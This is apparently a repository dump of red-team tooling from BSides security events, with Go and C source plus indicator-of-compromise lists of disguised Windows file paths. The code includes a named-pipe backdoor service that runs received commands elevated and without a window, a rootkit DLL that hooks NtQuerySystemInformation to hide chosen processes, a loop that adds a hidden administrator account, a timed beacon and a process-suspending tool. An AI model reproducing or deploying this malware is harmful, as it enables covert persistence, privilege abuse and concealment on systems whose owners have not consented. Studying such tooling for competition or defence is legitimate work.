C:\Windows\System32\bg-BG\nlaovc.mui 3 | C:\Windows\SysWOW64\hu-HU\Faultref.mui 4 | C:\Windows\SysWOW64\AdvancedInstallers\KBDTZO.db 5 | C:\Program Files\Internet Explorer\en-US\rtutias.com 6 | C:\Windows\SysWOW64\sv-SE\osuninsh.mui 7 | C:\Windows\System32\wbem\wbemoore.doc 8 | C:\Program Files (x86)\Common Files\System\MobileDevicesAddvn.mmc 9 | C:\Windows\System32\en\kdstsb.drv 10 | C:\Windows\SysWOW64\en\dot3ue.inf 11 | C:\Program Files\Common Files\System\ado\cavvbus.mmc 12 | C:\Windows\SysWOW64\AdvancedInstallers\EP0EXFSA.com 13 | C:\Windows\SysWOW64\ja-JP\fsus3setup.mui 14 | C:\Windows\WinSxS\wshnitbs.dll 15 | C:\Windows\SysWOW64\en\mdmntttl.mmc 16 | C:\Windows\SysWOW64\es-ES\ndikuio.mui 17 | C:\Windows\SysWOW64\ar-SA\appmgmas.mui 18 | C:\Windows\SysWOW64\ar-SA\KBDARME.mui 19 | C:\Windows\Microsoft.NET\shpafacq.db 20 | C:\Windows\SysWOW64\hu-HU\DhcpServerPSPdovider.mui 21 | C:\Program Files\Common Files\System\msadc\NlsLexicons7039.drv 22 | C:\Windows\System32\drivers\mssmkios.inf 23 | C:\Program Files (x86)\Common Files\System\Ole DB\mojter40.rtf 24 | C:\Windows\System32\downlevel\PCOTpm12.ocx 25 | C:\Windows\apppatch\MFMediaEngibe.mui 26 | C:\Windows\System32\fr-FR\yetupcln.mui 27 | C:\Windows\System32\bg-BG\wupf.mui 28 | C:\Windows\System32\pt-BR\rom.mui 29 | C:\Windows\System32\config\RegBack\acpgpmi 30 | C:\Windows\System32\migwiz\NlrData0009.mmc 31 | C:\Windows\SysWOW64\en-US\wucltud.mui 32 | C:\Windows\System32\drivers\npmproxi.cab 33 | C:\Windows\apppatch\pxeroot.sys 34 | C:\Windows\System32\Com\wcmsfc.cab 35 | C:\Windows\System32\ro-RO\w3wphosr.mui 36 | C:\Windows\Microsoft.NET\wuaiclt.inf 37 | C:\Program Files (x86)\Common Files\System\ado\WSDPrgnt.drv 38 | C:\Windows\SysWOW64\hu-HU\dfnet.mui 39 | C:\Program Files\Internet Explorer\en-US\PhotoOase.dll 40 | C:\Windows\System32\ru-RU\weidcom.mui 41 | C:\Windows\System32\Boot\uimom.drv 42 | C:\Program Files\Common Files\System\prm0066.mmc 43 | C:\Program Files (x86)\Common Files\System\ado\MTConfmg.sys 44 | C:\Program Files\Common Files\System\Ole DB\CBDFC.mui 45 | C:\Windows\SysWOW64\en-US\logoncri.mui 46 | C:\Windows\SysWOW64\wbem\ActionCemterCPL.drv 47 | C:\Program Files (x86)\Common Files\System\Ole DB\AcGencal.rtf 48 | C:\Windows\pvnekcl2.db 49 | C:\Windows\SysWOW64\fr-FR\wcmari.mui 50 | C:\Windows\SysWOW64\wbem\alb.cab 51 | C:\Windows\System32\Com\wupuclt.mui 52 | C:\Windows\SysWOW64\config\Journal\ldhui 53 | C:\Windows\System32\it-IT\agildvpn.mui 54 | C:\Windows\SysWOW64\hr-HR\npfr.mui 55 | C:\Program Files\Common Files\System\ado\psieftp.mui 56 | C:\Program Files (x86)\Common Files\System\ado\RpnProxyMigrationPlugin.drv 57 | C:\Windows\System32\nb-NO\kups.mui 58 | C:\Windows\WinSxS\ABDIULAT.ini 59 | C:\Windows\System32\bg-BG\NesLexicons0027.mui 60 | C:\Program Files\Common Files\System\ado\iscwiwmi.sys 61 | C:\Program Files\Internet Explorer\en-US\KBDHMB.ini 62 | C:\Windows\System32\Configuration\quaucomp.drv 63 | C:\Program Files\Common Files\System\wlidcreoprov.rtf 64 | C:\Windows\SysWOW64\migwiz\msltfmig.db 65 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/beacon.go: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2021 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | package main 17 | 18 | import ( 19 | "net" 20 | "os" 21 | "time" 22 | ) 23 | 24 | func main() { 25 | for { 26 | n, err := net.DialTimeout("tcp", "", time.Second*5) 27 | if err != nil { 28 | println("err", err.Error()) 29 | return 30 | } 31 | n.Write([]byte("")) 32 | if n.Close(); len(os.Args) == 1 { 33 | break 34 | } 35 | time.Sleep(time.Minute * 2) 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/client.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 18 | // 19 | package main 20 | 21 | import ( 22 | "os" 23 | 24 | "github.com/iDigitalFlame/xmt/com/pipe" 25 | ) 26 | 27 | func main() { 28 | if len(os.Args) < 2 { 29 | os.Exit(0) 30 | } 31 | 32 | u, err := pipe.Dial(pipe.Format("WinSockInitW")) 33 | if err != nil { 34 | os.Exit(1) 35 | } 36 | u.Write([]byte(os.Args[1])) 37 | u.Close() 38 | } 39 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/freeze.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 18 | // 19 | package main 20 | 21 | import ( 22 | "os" 23 | "strconv" 24 | 25 | "github.com/iDigitalFlame/xmt/cmd" 26 | ) 27 | 28 | func main() { 29 | if len(os.Args) != 2 { 30 | os.Stderr.WriteString(os.Args[0] + " \n") 31 | os.Exit(1) 32 | } 33 | 34 | v, err := strconv.ParseUint(os.Args[1], 10, 32) 35 | if err != nil { 36 | panic(err) 37 | } 38 | 39 | if err := cmd.SuspendProcess(uint32(v)); err != nil { 40 | panic(err) 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/hook.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2021 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | // Windows Xp+ 18 | #define WINVER 0x0501 19 | #define _WIN32_WINNT 0x0501 20 | // Windows Vista+ 21 | // #define WINVER 0x0600 22 | // #define _WIN32_WINNT 0x0600 23 | 24 | #define NOCOMM 25 | #define WIN32_LEAN_AND_MEAN 26 | 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | #define SIZE_JUMP 5 33 | #define SIZE_PATCH 19 34 | #define SIZE_IGNORE 7 35 | 36 | #define EXPORT __declspec(dllexport) 37 | 38 | // Included with auto-build 39 | #include "pac.h" 40 | 41 | typedef struct hook { 42 | HANDLE mutex; 43 | LPVOID target; 44 | unsigned char orig[SIZE_JUMP]; 45 | unsigned char patch[SIZE_JUMP]; 46 | } hook; 47 | typedef long long ptr; 48 | 49 | HANDLE mutexGlobal; 50 | 51 | unsigned char jump[SIZE_PATCH] = { 52 | 0x90, // nop 53 | 0x4C, 0x8B, 0xD0, // mv r10,rax 54 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 55 | 0x50, // push rax 56 | 0x49, 0x8B, 0xC2, // mv rax,r10 57 | 0xC3, // ret 58 | }; 59 | 60 | // These procs do NOT like hooks 61 | const char *ignored[SIZE_IGNORE] = { 62 | "DLLHost.exe\0", 63 | "LogonUI.exe\0", 64 | "regedit.exe\0", 65 | "consent.exe\0", 66 | "rundll32.exe\0", 67 | "werfault.exe\0", 68 | "taskhostex.exe\0" 69 | }; 70 | 71 | // ** HOOKS ** 72 | hook QuerySystemInfo; 73 | // ** END ** 74 | 75 | 76 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 77 | 78 | // Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit 79 | // address zone +/- of the pointer base. 80 | // Returns 0 if the specified empty size cannot be found. 81 | ptr Find(int size, ptr module, ptr func) { 82 | SIZE_T n; 83 | int c = 0; 84 | unsigned char b[1024]; 85 | for (ptr x = module; x < func+65535; x += 1024) { 86 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 87 | return 0; 88 | } 89 | for (int i = 0; i < n; i++) { 90 | if (b[i] == 0x90 || b[i] == 0xCC) { 91 | if (c >= size+1) { 92 | return x+i-size; 93 | } 94 | c++; 95 | continue; 96 | } 97 | c = 0; 98 | } 99 | } 100 | return 0; 101 | } 102 | 103 | // Redo will reapply the JMP and unlock the hook mutex. 104 | void Redo(hook *h) { 105 | SIZE_T n; 106 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 107 | ReleaseMutex(h->mutex); 108 | } 109 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 110 | void Undo(hook *h) { 111 | if (h->mutex == NULL || h->target == 0) { 112 | return; 113 | } 114 | WaitForSingleObject(h->mutex, INFINITE); 115 | SIZE_T n; 116 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 117 | } 118 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 119 | // The first argument is a pointer to a hook anchor. 120 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 121 | if (mod == NULL || func == NULL || replacement == 0) { 122 | return; 123 | } 124 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 125 | if (b == 0) { 126 | return; 127 | } 128 | SIZE_T n; 129 | h->target = (LPVOID)func; 130 | DWORD p; 131 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 132 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 133 | return; 134 | } 135 | if (h->orig[0] == 0xE9) { 136 | // Already hooked? 137 | h->target = 0; 138 | return; 139 | } 140 | WaitForSingleObject(mutexGlobal, INFINITE); 141 | jump[13] = (replacement >> 56) & 0xFF; 142 | jump[12] = (replacement >> 48) & 0xFF; 143 | jump[11] = (replacement >> 40) & 0xFF; 144 | jump[10] = (replacement >> 32) & 0xFF; 145 | jump[9] = (replacement >> 24) & 0xFF; 146 | jump[8] = (replacement >> 16) & 0xFF; 147 | jump[7] = (replacement >> 8) & 0xFF; 148 | jump[6] = replacement & 0xFF; 149 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 150 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 151 | ReleaseMutex(mutexGlobal); 152 | return; 153 | } 154 | ptr d = (b - 4) - (ptr)func; 155 | h->patch[4] = (d >> 24) & 0xFF; 156 | h->patch[3] = (d >> 16) & 0xFF; 157 | h->patch[2] = (d >> 8) & 0xFF; 158 | h->patch[1] = d & 0xFF; 159 | h->patch[0] = 0xE9; 160 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 161 | ReleaseMutex(mutexGlobal); 162 | if (r == 0 || n != SIZE_JUMP) { 163 | return; 164 | } 165 | h->mutex = CreateMutex(NULL, FALSE, NULL); 166 | } 167 | void Xor(unsigned char* key, int key_size, unsigned char* data, int data_size) { 168 | if (key_size <= 0 || data_size <= 0) { 169 | return; 170 | } 171 | DWORD o; 172 | VirtualProtect(data, data_size+1, PAGE_READWRITE, &o); 173 | for (int i = 0; i < data_size; i++) { 174 | data[i] = data[i] ^ key[i % key_size]; 175 | } 176 | VirtualProtect(data, data_size+1, o, &o); 177 | } 178 | 179 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 180 | if (find_len > src_len) { 181 | return -1; 182 | } 183 | int f = find_len - 1, t = find_len - 1; 184 | for (int x = src_len - 1; x >= 0; x--) { 185 | if (src[x] == 0) { 186 | continue; 187 | } 188 | if (src[x] == find[f]) { 189 | f--; 190 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 191 | f--; 192 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 193 | f--; 194 | } else { 195 | if (f < t) { 196 | x++; 197 | } 198 | f = t; 199 | } 200 | if (f < 0) { 201 | return src_len-(src_len-x); 202 | } 203 | if (f == t && x < find_len) { 204 | return -1; 205 | } 206 | } 207 | return -1; 208 | } 209 | 210 | BOOL ValidProcess(WCHAR *src, int src_len) { 211 | if (src_len == 0) { 212 | return FALSE; 213 | } 214 | for (int i = 0; i < EXEC_SIZE; i++) { 215 | if (IndexOf(src, src_len, pacData[i], pacSize[i]) != -1) { 216 | return TRUE; 217 | } 218 | } 219 | return FALSE; 220 | } 221 | BOOL IgnoredAttach(WCHAR *src, int src_len) { 222 | for (int i = 0; i < SIZE_IGNORE; i++) { 223 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 224 | return TRUE; 225 | } 226 | } 227 | return FALSE; 228 | } 229 | 230 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 231 | if (r == DLL_PROCESS_ATTACH) { 232 | WCHAR s[256]; 233 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 234 | if (n > 0 && IgnoredAttach(s, n)) { 235 | return TRUE; 236 | } 237 | for (int i = 0; i < LIST_SIZE; i++) { 238 | Xor(pacKey, KEY_SIZE, pacData[i], pacSize[i]); 239 | } 240 | HANDLE a = LoadLibraryW(L"ntdll.dll"); 241 | Hook(&QuerySystemInfo, a, GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 242 | } else if (r == DLL_PROCESS_DETACH) { 243 | Undo(&QuerySystemInfo); 244 | } 245 | return TRUE; 246 | } 247 | 248 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 249 | Undo(&QuerySystemInfo); 250 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 251 | Redo(&QuerySystemInfo); 252 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 253 | return r; 254 | } 255 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 256 | if (n->NextEntryOffset == 0) { 257 | return r; 258 | } 259 | DWORD p = GetCurrentProcessId(); 260 | PSYSTEM_PROCESS_INFORMATION c = NULL; 261 | while (n->NextEntryOffset != 0) { 262 | c = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 263 | if ((DWORD)(c->UniqueProcessId) == p || !ValidProcess(c->ImageName.Buffer, c->ImageName.Length)) { 264 | n = c; 265 | continue; 266 | } 267 | if (c->NextEntryOffset == 0) { 268 | n->NextEntryOffset = 0; 269 | } 270 | n->NextEntryOffset += c->NextEntryOffset; 271 | } 272 | return r; 273 | } 274 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/server.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 18 | // 19 | package main 20 | 21 | import ( 22 | "bytes" 23 | "io" 24 | "net" 25 | "strings" 26 | "sync" 27 | 28 | "github.com/iDigitalFlame/xmt/cmd" 29 | "github.com/iDigitalFlame/xmt/com/pipe" 30 | "github.com/iDigitalFlame/xmt/device/devtools" 31 | ) 32 | 33 | var bufs = sync.Pool{ 34 | New: func() interface{} { 35 | return new(bytes.Buffer) 36 | }, 37 | } 38 | 39 | func main() { 40 | (&devtools.Service{Start: listen}).Run() 41 | } 42 | func listen() { 43 | l, err := pipe.ListenPerms(pipe.Format("WinSockInitW"), pipe.PermEveryone) 44 | if err != nil { 45 | panic(err) 46 | } 47 | for { 48 | c, err := l.Accept() 49 | if err != nil { 50 | e, ok := err.(net.Error) 51 | if ok && e.Timeout() { 52 | continue 53 | } 54 | if ok && !e.Timeout() && !e.Temporary() { 55 | break 56 | } 57 | continue 58 | } 59 | b := bufs.Get().(*bytes.Buffer) 60 | io.Copy(b, c) 61 | c.Close() 62 | e := cmd.NewProcess("cmd.exe", "/c", strings.ReplaceAll(string(b.Bytes()), "\n", "")) 63 | b.Reset() 64 | e.Dir = "C:\\" 65 | bufs.Put(b) 66 | e.SetNoWindow(true) 67 | e.SetWindowDisplay(0) 68 | e.SetParent(cmd.F().SetElevated(true).SetSession(false)) 69 | e.Start() 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/user.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 18 | // 19 | package main 20 | 21 | import ( 22 | "strconv" 23 | "time" 24 | 25 | "github.com/iDigitalFlame/xmt/cmd" 26 | "github.com/iDigitalFlame/xmt/device/devtools" 27 | ) 28 | 29 | const userName = "BruhWhat" 30 | 31 | var count = 0 32 | 33 | func main() { 34 | (&devtools.Service{Exec: generate, Interval: time.Second * 30}).Run() 35 | } 36 | func generate() { 37 | p := cmd.NewProcess("cmd.exe", "/c", "net user "+userName+" "+strconv.Itoa(count)+" HelloThere /add") 38 | p.Dir = "C:\\" 39 | p.SetParent(cmd.F().SetElevated(true)) 40 | p.SetWindowDisplay(0) 41 | p.Run() 42 | p = cmd.NewProcess("cmd.exe", "/c", "net localgroup Administrators "+userName+" "+strconv.Itoa(count)+" /add") 43 | p.Dir = "C:\\" 44 | p.SetParent(cmd.F().SetElevated(true)) 45 | p.SetWindowDisplay(0) 46 | p.Run() 47 | } 48 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/IOCs.txt: -------------------------------------------------------------------------------- 1 | # IOCs 2 | 3 | These files are some indicators that were accessed by the executor files. 4 | 5 | C:\Windows\SysWOW64\fr-FR\mssmdm.mui 6 | C:\Windows\SysWOW64\et-EE\wwapi.mui 7 | C:\Windows\SysWOW64\da-DK\xpssermices.mui 8 | C:\Windows\System32\fr-FR\swell32.mui 9 | C:\Windows\System32\cs-CZ\ladrs411.mui 10 | C:\Windows\System32\Configuration\IMJPKJIC.db 11 | C:\Windows\System32\msctfmia.sys 12 | C:\Windows\SysWOW64\cs-CZ\imagerds.mui 13 | C:\Windows\security\clretwrn.rtf 14 | C:\Windows\SysWOW64\hr-HR\netvwisimp.mui 15 | C:\Program Files (x86)\Common Files\System\ado\vsmrafd.mmc 16 | C:\Program Files\Common Files\System\svrmfg.rtf 17 | C:\Windows\SysWOW64\config\scwangf 18 | C:\Windows\SysWOW64\AdvancedInstallers\ibfoctrs.doc 19 | C:\Windows\Microsoft.NET\fbdfar.drv 20 | C:\Windows\System32\dmvdjitf.ocx 21 | C:\Windows\SysWOW64\en-US\sdbhs.mui 22 | C:\Windows\System32\zh-CN\logcuat.mui 23 | C:\Windows\SysWOW64\wbem\usbmlgplugin.ini 24 | C:\Windows\System32\fr-FR\amdppe.mui 25 | C:\Windows\SysWOW64\ar-SA\wkaucpl.mui 26 | C:\Windows\SysWOW64\da-DK\MOEAgent.mui 27 | C:\Windows\SysWOW64\da-DK\iologksg.mui 28 | C:\Windows\SysWOW64\ja-JP\AppXDeploymentCliert.mui 29 | C:\Windows\System32\setup\lgcense.db 30 | C:\Windows\Provisioning\oskninst.inf 31 | C:\Windows\SysWOW64\zh-TW\ibbys.mui 32 | C:\Windows\SysWOW64\zh-TW\KPDSP.mui 33 | C:\Windows\SysWOW64\en\EventLogMespages.dll 34 | C:\Windows\SysWOW64\downlevel\wwqninst.mui 35 | C:\Program Files\Common Files\System\Ole DB\bxvwda.ocx 36 | C:\Windows\System32\ru-RU\vsswni.mui 37 | C:\Program Files (x86)\Internet Explorer\en-US\iudiodev.com 38 | C:\Windows\Microsoft.NET\tiffbilt.rtf 39 | C:\Windows\SysWOW64\ja-JP\OLHelper.mui 40 | C:\Windows\System32\config\RegBack\KBDESN 41 | C:\Windows\SysWOW64\config\tasklchd 42 | C:\Windows\SysWOW64\oobe\wuauenh.ini 43 | C:\Windows\SysWOW64\en-GB\shfmeng.mui 44 | C:\Windows\SysWOW64\da-DK\certorop.mui 45 | C:\Windows\System32\migration\adlclient.dll 46 | C:\Windows\System32\AdvancedInstallers\usouhci.sys 47 | C:\Windows\SysWOW64\cs-CZ\wdscowe.mui 48 | C:\Windows\SysWOW64\fr-FR\JordpadFilter.mui 49 | C:\Windows\System32\Sysprep\wxaueng.drv 50 | C:\Windows\SyncSharvTTLib.mmc 51 | C:\Windows\SysWOW64\dft3dlg.db 52 | C:\Windows\SysWOW64\Dism\KBQSN1.ocx 53 | C:\Windows\System32\oobe\ernekcl2.sys 54 | C:\Windows\Microsoft.NET\OSProvimer.inf 55 | C:\Windows\SysWOW64\config\processt 56 | C:\Windows\Microsoft.NET\ppeboot.sys 57 | C:\Windows\System32\downlevel\wuspi.db 58 | C:\Windows\System32\en\xsbceip.db 59 | C:\Windows\SysWOW64\cs-CZ\infocmrs.mui 60 | C:\Windows\SysWOW64\et-EE\bifcoe.mui 61 | C:\Windows\System32\pt-BR\shyolder.mui 62 | C:\Windows\System32\Sysprep\tqqery.dll 63 | C:\Program Files\Internet Explorer\en-US\cdaom.dll 64 | C:\Program Files (x86)\Internet Explorer\oclWdi.doc 65 | C:\Windows\SysWOW64\es-ES\veoinput.mui 66 | C:\Windows\SysWOW64\da-DK\DiagEpl.mui 67 | C:\Windows\servicing\clbcaxq.db 68 | C:\Program Files (x86)\Internet Explorer\wuaucgt.ocx 69 | C:\Windows\SysWOW64\bg-BG\gpprefhl.mui 70 | C:\Windows\System32\pt-BR\BCMWL63AB.mui 71 | C:\Windows\System32\dsc\wlanueil.doc 72 | C:\Windows\System32\alsldpc.ocx 73 | C:\Windows\System32\AdvancedInstallers\NdisImPlaxform.mui 74 | C:\Windows\System32\bg-BG\bitserx6.mui 75 | C:\Windows\SysWOW64\netcwgx.mui 76 | C:\Windows\System32\ko-KR\ibsvc.mui 77 | C:\Program Files (x86)\Common Files\System\msadc\pln.sys 78 | C:\Windows\SysWOW64\downlevel\MsoIdcroWrapper.ini 79 | C:\Windows\Panther\msidcrl49.doc 80 | C:\Windows\SysWOW64\zh-TW\EAPQHC.mui 81 | C:\Windows\servicing\vls.sys 82 | C:\Windows\System32\ko-KR\ZininetPlugin.mui 83 | C:\Windows\System32\it-IT\uoadperf.mui 84 | C:\Windows\System32\drivers\en-US\WXSls.mui 85 | C:\Windows\SysWOW64\ar-SA\cmsjplua.mui 86 | C:\Program Files\Common Files\System\msadc\MsSpnllCheckingFacility.db 87 | C:\Windows\System32\zh-TW\sgwga.mui 88 | C:\Windows\SysWOW64\ar-SA\webengiie.mui 89 | C:\Windows\SysWOW64\config\RegBack\wmk 90 | C:\Windows\cmllite.doc 91 | C:\Windows\SysWOW64\mamsonyu.mui 92 | C:\ProgramData\Microsoft\Windows\Caches\HPScanTSDrvXn8.inf 93 | C:\Program Files (x86)\Common Files\System\Ole DB\wuwlb.db 94 | C:\Windows\Microsoft.NET\mdqgsm.mmc 95 | C:\Windows\System32\migwiz\RTV8192su.mmc 96 | C:\Windows\System32\ru-RU\BCP77Langs.mui 97 | C:\Windows\System32\config\BRIBEN92 98 | C:\Windows\SysWOW64\setup\bqmapi.doc 99 | C:\Windows\SysWOW64\Dism\BRIBRYM00.com 100 | C:\Windows\SysWOW64\et-EE\wuaveng.mui 101 | C:\Windows\SysWOW64\downlevel\iqlogmsg.inf 102 | C:\Windows\SysWOW64\setup\gl2300.com 103 | C:\Windows\SysWOW64\pcu.mui 104 | C:\Windows\Provisioning\dmgskres.inf 105 | C:\Windows\System32\downlevel\tuser.ocx 106 | C:\Windows\System32\setup\wusetbp.rtf 107 | C:\Windows\SysWOW64\es-ES\sxshaeed.mui 108 | C:\ProgramData\Microsoft\Windows\Caches\SRT.mui 109 | C:\Windows\System32\pt-BR\wmips.mui 110 | C:\Windows\System32\ro-RO\bcryvt.mui 111 | C:\Windows\SysWOW64\Com\crypsbase.db 112 | C:\Program Files\Common Files\System\Ole DB\commase.mui 113 | C:\Windows\System32\config\RegBack\WSSercice 114 | C:\Windows\SysWOW64\et-EE\vbsqript.mui 115 | C:\Windows\System32\wbem\KBDINBEH.db 116 | C:\Windows\System32\oobe\PowerWmiPhovider.mmc 117 | C:\Windows\SysWOW64\Sysprep\EveetAggregation.drv 118 | C:\Windows\System32\pt-BR\viatrace.mui 119 | C:\Windows\System32\bg-BG\pmrfnet.mui 120 | C:\Windows\SysWOW64\Com\WYDScan.drv 121 | C:\Program Files (x86)\Internet Explorer\en-US\TLBAEF.sys 122 | C:\Windows\SysWOW64\config\wupq 123 | C:\Windows\System32\oobe\dbskmon.cab 124 | C:\Windows\SysWOW64\config\Journal\dxtrsft 125 | C:\Windows\System32\migration\MUILanguageClyanup.doc 126 | C:\Windows\System32\nb-NO\neroexts.mui 127 | C:\Windows\System32\AdvancedInstallers\WMIsac.inf 128 | C:\Windows\System32\wbem\iesyspxep.doc 129 | C:\Windows\System32\Sysprep\PtlsAuth.inf 130 | C:\Windows\servicing\rasctss.com 131 | C:\Windows\System32\sk-SK\rups.mui 132 | C:\Windows\System32\config\Journal\vmrdvnore 133 | C:\Program Files\Common Files\System\ado\klxstor.ini 134 | C:\Windows\SysWOW64\pt-BR\pdnlxclw.mui 135 | C:\Program Files\Internet Explorer\en-US\msiltceg.rtf 136 | C:\Windows\System32\wbem\tetdacim.db 137 | C:\Windows\System32\Dism\dmdskros2.com 138 | C:\Windows\SysWOW64\drivers\craehdmp.inf 139 | C:\Windows\Panther\KBSKNI.com 140 | C:\Windows\System32\Boot\hiddiwi.doc 141 | C:\Windows\System32\cs-CZ\coictl32.mui 142 | C:\Windows\System32\Sysprep\isnewmi.drv 143 | C:\Windows\System32\es-ES\vofflvs.mui 144 | C:\Windows\System32\Boot\QSSync.doc 145 | C:\Windows\SysWOW64\ja-JP\cavhuri.mui 146 | C:\Program Files\Common Files\System\msadc\KPDCZ2.db 147 | C:\Windows\WinSxS\mprsnop.rtf 148 | C:\Windows\System32\config\cmupil 149 | C:\Windows\SysWOW64\zh-TW\nrsi.mui 150 | C:\Windows\System32\AdvancedInstallers\HlsLexicons0c1a.ini 151 | C:\Program Files (x86)\Common Files\System\msadc\user35.mmc 152 | C:\Windows\System32\Sysprep\smbiirect.inf 153 | C:\Windows\SysWOW64\sv-SE\Vij.mui 154 | C:\Windows\System32\migration\secureboolai.com 155 | C:\Windows\perhctrs.cab 156 | C:\Windows\System32\drivers\WMPhoco.cab 157 | C:\Windows\SysWOW64\en\AfpIdPolicyEngineApi.inf 158 | C:\Windows\SysWOW64\Com\kbdneiat.ini 159 | C:\Windows\System32\ru-RU\qxva2.mui 160 | C:\Windows\SysWOW64\et-EE\NlsLeuicons0414.mui 161 | C:\Windows\System32\tlethk32.mmc 162 | C:\Program Files (x86)\Common Files\System\WmiPerfRnst.inf 163 | C:\Windows\SysWOW64\ar-SA\cvc.mui 164 | C:\Windows\System32\fr-FR\dhcpnnap.mui 165 | C:\Windows\System32\ko-KR\WinMsoIrmProtecjor.mui 166 | C:\Windows\System32\en-US\pod.mui 167 | C:\Windows\System32\prrfos.drv 